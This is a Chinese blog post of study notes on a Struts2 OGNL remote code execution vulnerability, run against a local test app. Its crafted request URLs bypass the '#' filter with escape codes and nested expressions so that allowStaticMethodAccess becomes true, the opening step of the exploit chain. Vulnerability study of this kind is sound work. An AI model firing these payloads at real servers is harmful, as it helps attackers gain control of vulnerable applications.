struts2远程执行漏洞学习(二)

最新推荐文章于 2022-06-07 15:43:30 发布
最新推荐文章于 2022-06-07 15:43:30 发布
阅读量135 收藏
点赞数
分类专栏: java hacker struts 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wcf1987/article/details/84158241
版权
hacker 同时被 3 个专栏收录
53 篇文章 1 订阅
订阅专栏
java
35 篇文章 0 订阅
订阅专栏
struts
7 篇文章 0 订阅
订阅专栏

  http://commons.apache.org/ognl/language-guide.html

这个是ognl的官网,在这里能看到不少这个ognl的表达式的介绍。

下来开始测试,

 

我首先选择的是struts2.1.18版本这是一个简单的赋值测试,目的是改变context中的

43_memberAccess['allowStaticMethodAccess']=true,这个事webwork中很重要的一个参数,他决定了你是否可以在ognl表达式中使用静态方法,这个在后面的使用中十分重要。

 

 

 

http://localhost:8080/sr218/ice.action?#_memberAccess['allowStaticMethodAccess']=true

 

实际上这句话并不能很好的完成工作,因为struts2中的xwork过滤掉了#,这里就是这个漏洞的起始点,虽然他过滤掉了#

但是我们可以使用\u0020  \43   \043 ,分别是16进制的unicode编码,8进制的编码这三种方式绕过对#的过滤

http://localhost:8080/sr218/ice.action?\43_memberAccess['allowStaticMethodAccess']=true

 

但是如果这样依旧会有问题,会产生无法解析的语法树,因为\43这样的他是直接无法解析的,需要用'号括起来

http://localhost:8080/sr218/ice.action?'\43_memberAccess[\'allowStaticMethodAccess\']'=true
由于外层有了单引号,所以内层也要对单引号做转义。这样的语句就可以正常生成ast树了

 

接下来问题实际上是现在这样仍然无法识别出#_memberAccess['allowStaticMethodAccess'],所以这里才用了个小技巧,构造了复杂一些的ast树

('\43_memberAccess[\'allowStaticMethodAccess\']')(a)

这样的ast树实际上是有两个节点,

('\43_memberAccess[\'allowStaticMethodAccess\']')(b)=true

然后赋值就可以了,这里我觉得之所以需要构建2层语法树,实质上是和转义有关的。

 

 

http://localhost:8080/sr218/ice.action?('\43_memberAccess[\'allowStaticMethodAccess\']')(b)=true

这就是对



 
对这个context中控制ognl关键变量的改变。
 

 

当然我们还有另一种写法

http://localhost:8080/sr218/ice.action?('\43_memberAccess.allowStaticMethodAccess')(b)=true

这样的写法也是可以的,而且比较简洁,就看你怎么选了

wcf1987
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ognl简介
oydl_1234的博客
10-11 1284
一、ognl概述 1、 OGNL的全称是Object Graph Navigation Language(对象图导航语言),它是一种强大的表达式语言 。Struts框架使用OGNL作为默认的表达式语言。可以存取对象的任意属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。 2、OGNL有一个上下文(Context)概念,说白了上下文就是一个MAP结构,它实现了java.util...
Struts漏洞分析与研究
forbidd3n,keep going
10-13 2864
1. Apache官方公告 http://struts.apache.org/development/2.x/docs/security-bulletins.html 其中涉及代码执行漏洞有:S2-003,S2-005,S2-007,S2-008,S2-009,S2-012~S2-016,S2-20~21下面逐一简要说明。 2. 各版本漏洞分析 S2-003 受影响版本
OGNL的jar档、文档和源代码
邓不利多的博客
12-03 1105
1、官方网站: http://mirrors.ibiblio.org/pub/mirrors/maven2/opensymphony/ognl/2.6.11/
Ognl的扩展
weixin_42286658的博客
06-07 347
ognl 的自定义扩展
struts2远程执行漏洞学习
v5browser
08-21 121
首先,这个漏洞已经是比较早的一个了,大概影响范围是struts2.2.1.1以下版本(这个其实是不对的),其次值得参考的参考的网上公开资料有 http://security.ctocio.com.cn/100/11466600.shtml 这是我看过的唯一的一篇对这个漏洞有一定深入讲解的文章。 http://www.securityfocus.com/ar...
Struts2远程执行漏洞 Jar包集合体
08-26
然而,随着时间的推移,Struts2框架发现了一系列的安全漏洞,这些漏洞可能导致远程代码执行(RCE)风险,使攻击者能够完全控制受影响的服务器。在给定的标题和描述中,提到了几个关键的Struts2漏洞,包括S2-057、S2-...
Struts2远程命令执行验证工具
11-22
1. **快速检测**:该工具能够迅速扫描并检测出是否存在Struts2远程命令执行漏洞,节省了手动检查的时间和精力。 2. **批量导入验证**:对于大型网络环境,支持批量导入多个目标URL,进行批量检测,提高了工作效率。...
Struts2远程命令执行漏洞解析
01-06
Struts2远程命令执行漏洞解析 漏洞解析 远程命令 Struts2
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
STRUTS2的getClassLoader漏洞利用
01-30
引用《Springframework(cve-2010-1622)漏洞利用指南》:Struts2其实也本该是个导致远程代码执行漏洞才对,只是因为它的字段映射问题,只映射基础类型,默认不负责映射其他类型,所以当攻击者直接提交URLs[0]
ognl官网下载源码
03-16
http://www.opensymphony.com/ ognl源码,在官网cvs下载,送给那些懒得用cvs下载的人~~~
OGNL中文版详细文档
12-15
目录 1. 简介 2. 历史 3. 语法 4. 表达式 常数 属性引用 索引 数组(Array)与列表(List)的索引 JavaBean中的索引属性(Indexed Properties) OGNL特有的对象索引属性(Object Indexed Properties) 调用方法 变量引用 带括号的表达式 子表达式(Subexpressions)链 构造集合(Collection) 列表(Lists) 数组 映射表(Maps) 对集合的投影(Project) 在集合中查询 查找第一个匹配项 查找最后一个匹配项 调用构造方法 调用静态方法 读取静态域(Static Fields) 表达式计算 伪Lambda表达式 供集合使用的伪属性 与Java语言不同的操作符 赋值与取值 5. 对象到数据类型的强制转换 将对象解释为布尔值 将对象解释为数值 将对象解释为整数 将对象解释为集合 附录A. OGNL语言参考 操作符 表格一览 3.1. OGNL 表达式元素 4.1. 集合的特殊伪属性 A.1. OGNL 操作符
OGNL中文文档
03-19
不好意思,实在穷,想要去下载其它资源都没有钱,不好意思啊各位
Struts2 漏洞集合
kali_Ma的博客
01-21 7452
Struts2 漏洞集合 总结了一部分 Strtus2 漏洞,虽然现在这部分的漏洞很少了,但也是学习的一部分,收集的并不全面,后续会做补充。 漏洞环境搭建可以使用在线的 Vulfocus ,或者使用docker部署 S2-001 (CVE-2007-4556) 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用
Mybatis中的OGNL使用总结
热门推荐
一个普通码农的总结
09-07 1万+
经常在写mapper中用到一些OGNL,但是没怎么总结,使用方法一直模模糊糊的。抽点时间,查了别人的blog,做个简单的总结; 1.概念; OGNL,Object Graph Navigation Language,是一种强大的表达式语言,网上搜索这个概念,多是和structs有关的。但是在mybatis中OGNL应用很广的; 2.基本参数: Mybatis中常用的OGNL表达式有以下:
OGNL简介
钰团的博客
06-28 1449
OGNL简介 OGNL介绍 OGNL的全称是Object Graph Navigation Language(对象图导航语言),它是一种强大的表达式语言 OGNL相当于一个上下文(Context)概念,说白了上下文就是一个MAP结构,它实现了java.utils.Map 的接口。Struts框架默认就支持Ognl表达式语言。(从struts项目必须引入ognl.jar包可以看出)、 OgnlC...
OGNL在Mybatis中的简单使用
zoeou的博客
02-18 2184
OGNL是Object-Graph Navigation Language的缩写,它是一种功能强大的表达式语言,通过它简单一致的表达式语法, 可以存取对象的任意属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。它使用相同的表达式去存 取对象的属性。这样可以更好的取得数据。 OGNL写法 String与基本类型 可以直接写成#{_parameter} 自定义类型
MyBatis中的OGNL表达式
lihaomuye的专栏
08-08 5289
S2-052远程代码执行漏洞
最新发布
07-27
S2-052远程代码执行漏洞是Apache Struts 2框架中的一个安全漏洞,影响版本为2.0.0至2.5.12。该漏洞允许攻击者通过构造恶意的OGNL(Object-Graph Navigation Language)表达式,远程执行任意代码。 攻击者可以通过发送恶意的HTTP请求,利用漏洞执行任意的代码,可能导致服务器被完全控制。此漏洞的危害性较高,因此建议尽快升级到修复该漏洞的版本,或者应用相关的安全补丁。 如果你是开发者或系统管理员,请确保你的应用程序使用的是修复了该漏洞的Apache Struts 2版本,并及时关注相关安全公告以保持系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值